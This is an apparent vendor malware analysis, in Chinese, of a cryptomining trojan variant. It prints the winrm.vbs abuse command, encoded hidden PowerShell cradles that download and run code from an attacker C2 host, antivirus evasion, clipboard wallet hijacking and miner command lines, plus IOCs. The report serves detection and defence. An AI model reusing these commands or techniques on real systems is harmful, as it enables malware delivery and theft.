0x1背景 腾讯御见威胁情报中心近期发现“美人蝎”挖矿木马新变种，该变种从9月开始感染量出现上涨。该挖矿木马延续“美人蝎”矿工木马的部分特点，如从下载的图片中获取恶意代码，通过多种矿机挖取多种数字加密货币，同时也有若干新特性。 “美人蝎”挖矿木马变种采用的新特性包括： 白利用winrm.vbs启动powershell脚本，或通过NSSM将powershell脚本安装为服务，多次将恶意代码通过内存注入系统白进程来减少文件落地，从而躲避系统安全功能或杀毒软件的拦截。 注：winrm.vbs是位于system32目录下具有Windows签名的脚本文件，是一个正常系统文件。NSSM是一款服务管理工具，具有自动守护功能，使用该工具安装服务后会使恶意代码难以检测，反复执行。 分析发现“美人蝎”挖矿木马变种对杀毒软件明显心存畏惧，当检测到电脑有常见杀毒软件运行时，会选择退出逃避。因而，这个新变种发布后近两个月的时间里，其挖矿收益甚微。这也证明，杀毒软件对病毒木马产业具有一定的威慑力。 “美人蝎”挖矿木马变种的技术特点总结如下： 1.利用Winrm.vbs（有微软数字签名的白应用）加载恶意代码，这种机制有较大可能性骗过系统安全功能和杀毒软件的拦截； 2.恶意代码运行前，会检查本机是否运行常见的安全软件，如果有，就退出； 3.检测到任务管理器进程，就暂停门罗币挖矿进程，防止用户观察到异常系统资源占用； 4.监控剪切板内容，若中毒电脑进行以太坊币或比特币交易，资金就会转入病毒作者控制的钱包地址。 5.利用NSSM服务管理工具，将Powershell恶意脚本安装为服务，使恶意代码难以检测，由服务来持续判断当前环境是否已经感染成功，若未成功则重新下载木马进行感染。 “美人蝎”变种木马与之前版本的异同： 相同点： 通过下载的激活工具等软件捆绑传播；下载图片，从图片中获取恶意代码，且开始地址标记为“0x33E0F0D”；使用gominer、xmrig等多种矿机挖取多种数字加密货币。 不同点： 不再使用DNS隧道通信；图片中裹挟Loader木马改为裹挟木马主体；木马主体、挖矿木马均通过内存注入系统白进程，减少文件落地；新增剪切板盗取钱包功能；启动方式改为NSSM，白利用winrm.vbs启动Powershell脚本。  “美人蝎”挖矿木马变种的工作流程 0x2详细分析0x2.1 winrm.vbs利用 winrm.vbs（一个位于system32目录下的具有Windows签名的脚本文件）可以被用来调用用户定义的XSL文件。 当向winrm.vbs提供’-format:pretty’或者’-format:text’参数时，winrm.vbs将从cscript.exe所在目录读取WsmPty.xsl或Wsmtxt.xsl文件。攻击者利用有微软数字签名的白应用加载恶意代码，这种机制有较大可能性骗过系统安全功能和安全软件的拦截。 木马利用过程如下： 1、创建文件C:\Users\Public\WsmPty.xsl； 2、拷贝cscript.exe到C:\Users\Public\目录； 3、通过以下命令行执行winrm.vbs从而调用WsmPty.xsl C:\Users\Public\cscript.exe //nologo C:\Windows\System32\winrm.vbs get wmicimv2/Win32_Process?Handle=4 -format:pretty 4、利用成功后执行powershell命令: powershell.exe -nop -noni -w hidden -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMgAwAAoASQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwBwAHMALgBuAGEAbQBlAGEAcABwAC4AdwBlAGIAcwBpAHQAZQAnACkAKQA= powershell命令base64解码: Start-Sleep -Seconds 20 IEX ((new-object net.webclient).downloadstring('')) Powershell执行后从hxxp://ps.nameapp.website返回代码web.ps1 执行powershell代码hxxp://web.websitete.website/web.ps1 Web.ps1检测以下进程（判断存在杀软环境或机器已经感染过），则退出powershell： 360tray 360sd zhudongfangyu QQPcTray kxetray HipsTray cmd calc osk 然后下载hxxp://web.websitete.website/ppp.exe到目录C:\Users\Public\conhost.exe并启动。 0x2.2傀儡进程 conhost会从网站下载jpg文件 hxxp://shop.ybk001.com/memberpic/wabpek201895135056776189.jpg，判断文件大小如果小于600000则从另外一个网址下载jpeg文件 hxxp://www.1990tu.com/i/20180905133747p52.jpeg。 “美人蝎”新变种在图片使用上已由美女图变为Windows7系统默认桌面背景图。但是图片中裹挟PE文件的加密数据标记依然采用4字节“0x33E0F0D”，并在开始标记随后4字节记录内存大小。 （参考：“美人蝎”矿工通过DNS隧道技术逃避拦截https://mp.weixin.qq.com/s/oiugRwbFlhgCk0lNf0-IOw） 下载图片 用下载的文件大小减去0xBA3DC得到偏移值offset，接着将FileData+offset拷贝到一块新内存。 判断到内存的头4字节为0x33E0F0D，是则使用第二个四字节乘以2作为数据的大小，然后调用zlib库的uncompress函数将数据解析解压，解压后即可得到一个PE文件。 然后创建傀儡进程，然后将图片解密出的数据替换进程内存，创建失败则换一个傀儡进程，共3个（cmd.exe、calc.exe、osk.exe）。 0x2.3对抗杀软 0x2.3.1检测进程 开始运行检测到杀软进程时，将自身退出。 接下来的分析发现，病毒代码中还有在运行过程中利用COM接口枚举杀软进程，并对杀软进程进行强制结束并删除文件的动作。当病毒运行时，主要以逃避杀毒软件为主，若病毒先感染，用户后安装杀毒软件时，这个对抗行为才有可能得逞。 同时会检查taskmgr.exe任务管理器进程是否运行中，如果运行中则将XMR挖矿进程挂起，防止用户通过taskmgr进程找到CPU异常的进程，当taskmgr进程关闭后，重新恢复XMR挖矿进程。 0x2.3.2阻止联网 将一段文本覆盖写出到系统的hosts文件，屏蔽杀软访问网络。 将域名360.cn、360.com映射到IP 102.54.94.97 将www.360.cn、www.360.com映射到IP 38.25.63.10 这个对抗行为和上面的逻辑类似，若杀软已安装，病毒检测到就会退出。若病毒先运行，杀毒软件后安装，则进行对抗。 0x2.4盗取钱包 通过检查剪切板内容，截获用户交易过程中使用的数字加密货币地址来盗取收益。 启动线程递归调用自身，每隔1000ms获取剪切板内容。 若匹配到内容长度符合以太坊钱包格式，则将其替换为0xe986654707f147f425a34a6087b5b2b18cdc408f 若检测内容长度符合比特币钱包格式，则将其替换为 3GDusxDymPt1gRTrKK44ry7xME6KxxaMy6 0x2.5挖矿 0x2.5.1门罗币挖矿 木马主体代码数据段中保存有门罗币矿机的加密数据，该段数据与下载的图片裹挟PE文件类似，以0x33E0F0D标记开头。  通过解密函数解密出门罗币矿机PE 该矿机采用开源门罗币挖矿程序XMRig 2.6.4编译（github地址：hxxps://github.com/xmrig/xmrig） 创建第二阶段傀儡进程（带参数），使用解密出的门罗币矿机来填充内存，创建失败则换一个傀儡进程，共3个（svchost.exe、cmd.exe、calc.exe）。 门罗币矿机PE填充到傀儡进程 挖矿命令行： -a cryptonight -o stratum+tcp://pool.minexmr.com:80 -u 485XqEaLG9dfLbL36JrYxHXbSb2bhKE1QM9w1iEEoMLqFW4zXMzdqjx5HjwgtVBpEWA66CeFXbe1ACtbY6q16Kji4PmKAi5 -p x 矿池： pool.minexmr.com 钱包： 485XqEaLG9dfLbL36JrYxHXbSb2bhKE1QM9w1iEEoMLqFW4zXMzdqjx5HjwgtVBpEWA66CeFXbe1ACtbY6q16Kji4PmKAi5 收益：3.82个门罗币 从钱包支付记录来看，该挖矿木马从8月1号开始上线，目前挖得门罗币3.82个。 0x2.5.2比特无限挖矿 木马主体从网站下载jpeg文件 hxxp://www.1990tu.com/i/20180905132828bao.jpeg，判断文件大小如果小于1646406则从另外一个网址下载jpg文件 hxxps://s15.postimg.cc/43qcmc1d7/999.jpg。 图片中裹挟的PE加密数据经过解密后得到BCX（比特无限）矿机gominer，保存文件为C:\Users\***\AppData\Local\Temp\audiodg.exe，并使用以下参数启动挖矿进程 audiodg.exe -url stratum+tcp://bcx.vvpool.com:5660 -user XX4tjZ4Js1fsGyWrGhXrRA2erSvjNhopHB.c -I 18 解密出的Gominer开源矿机 （github地址：hxxps://github.com/bitcoinx-project/gominer/tree/master/clients/stratum） 矿池2： Bcx.vvpool.com 钱包2： XX4tjZ4Js1fsGyWrGhXrRA2erSvjNhopHB 从8月9日开始产生收益，已挖得422863个BCX 0x2.6持续感染 木马使用NSSM安装powershell恶意脚本为服务，NSSM是一款服务管理工具，具有自动守护功能，使用该工具安装服务后会使恶意代码难以检测，反复执行。 install nssm powershell.exe -nop -noni -w hidden -enc RwBlAHQALQBQAHIAbwBjAGUAcwBzACAALQBOAGEAbQBlACAAbgBzAHMAbQAgAHwAIABTAHQAbwBwAC0AUAByAG8AYwBlAHMAcwAKAFMAdABhAHIAdAAtAFMAbABlAGUAcAAgAC0AUwBlAGMAbwBuAGQAcwAgADgAMAAKAEkARQBYACAAKAAoAG4AZQB3AC0AbwBiAGoAZQBjAHQAIABuAGUAdAAuAHcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AcABzAC4AbgBhAG0AZQBhAHAAcAAuAHcAZQBiAHMAaQB0AGUAJwApACkA base64解码： Get-Process -Name nssm | Stop-Process Start-Sleep -Seconds 80 IEX ((new-object net.webclient).downloadstring('')) powershell脚本作为服务反复执行，持续判断当前环境是否已经感染，否则重新下载木马进行感染。 0x3关联分析 经过分析，我们发现此样本应该是此前腾讯威胁情报中心曝光过的：“美人蝎”挖矿木马，相关原文链接：https://mp.weixin.qq.com/s/oiugRwbFlhgCk0lNf0-IOw 之所以这样认定，主要根据此样本和“美人蝎”木马样本在如下方面存在相似性： 1.      样本都是将挖矿程序隐藏在一张正常的图片中。 2.      样本在调用zlib解压过程中使用的函数调用跳转代码一致。 3.      下载回来的图片的数据标识及结构上一致。 4.      样本在进行代码混淆方面使用的手段很像。 5.      样本使用的BCX、XMR挖矿样本一致。 基于以上特征，我们可以认定此样本就是“美人蝎”挖矿木马作者利用winrm.vbs白利用技术发起的新一轮攻击。 两次活动中加密数据布局 函数调用跳转代码 而从作者的收益上看比上次有所减少，目前只有一万多人民币，但是这里有个需要注意的地方，那就是和上次样本一样，样本在整个感染过程中极力避免和国内的安全软件进行接触，一旦发现用户主机安全软件在运行则直接退出。 从这里我们可以看出，安全软件对病毒木马作者有一定的威慑能力，病毒木马作者发现自己跟杀毒软件的对抗无法取胜时，会选择逃避。因为杀毒软件的普及率较高，病毒又选择这种逃避的策略，因而这个“美人蝎”挖矿木马变种的挖矿收益较低。                               木马获利情况 安全建议 1、这个“美人蝎”挖矿木马主要隐藏于一些盗版、破解、激活、游戏外挂等小工具软件中传播，腾讯安全专家建议用户不要使用来历不明的软件，不要随意使用破解、激活工具； 2、个人用户建议使用腾讯电脑管家拦截，这个挖矿木马检测到腾讯电脑管家在运行时，就会马上逃跑。 3、企业用户建议全网安装御点终端安全管理系统。（https://s.tencent.com/product/yd/index.html） IOCs C2: ps.nameapp.website web.websitete.website URL hxxp://web.websitete.website/ppp.exe hxxp://www.1990tu.com/i/20180826221707tmk.jpeg hxxp://shop.ybk001.com/memberpic/ndtkbt2018826223028763405.jpg hxxp://www.1990tu.com/i/2018082621381780g.jpeg hxxps://s15.postimg.cc/lh3rhud57/999.jpg hxxp://shop.ybk001.com/memberpic/wabpek201895135056776189.jpg hxxp://www.1990tu.com/i/20180905133747p52.jpeg hxxp://www.1990tu.com/i/20180905132828bao.jpeg hxxps://s15.postimg.cc/43qcmc1d7/999.jpg hxxp://hao.ug118.com/ddd.jpg hxxp://www.1990tu.com/i/20180919193857kl9.jpeg 矿池-钱包 pool.minexmr.com（门罗币） 485XqEaLG9dfLbL36JrYxHXbSb2bhKE1QM9w1iEEoMLqFW4zXMzdqjx5HjwgtVBpEWA66CeFXbe1ACtbY6q16Kji4PmKAi5 44uyyeCqheLTQpZUTK5uXWVq8iwkn5w5L2hSPuMJACj5eNAPvceRWY8dEPu5rBcBEh5EJ5Z3PajkbWKCKzixDZCm1EFkMRg bcx.vvpool.com（比特无限） XX4tjZ4Js1fsGyWrGhXrRA2erSvjNhopHB md5 7ddb1a0ed03151cd3ea76f7cb5ec28ae 4507f6f5f8dea3f651875866a5465876 f94aa36cd3086874c593298619ca8f14 7330aef076cf4498303e39031465dba5 ed3cc769e0eea63c83ac4648f0a72268 edd16109e74c0c96d006ee76c9abcbd6 47383a36d2bc68ae525dfe59d4a0f2fa ffc962f058c5aaddc956dcf0455c04be 79f8daa3f4cd99591c9b47a0a3bfcc7a 6799501e58bd17b9db95a610d7167a07 a03aa449dbd18214eae3956ab2b2b24c ad35b6aace32ea93691ec80c8148c82c aa2d30992087047ef638674198209948 参考链接： https://posts.specterops.io/application-whitelisting-bypass-and-arbitrary-unsigned-code-execution-technique-in-winrm-vbs-c8c24fb40404 https://mp.weixin.qq.com/s/oiugRwbFlhgCk0lNf0-IOw [招生]科锐逆向工程师培训(2024年11月15日实地，远程教学同时开班, 第51期)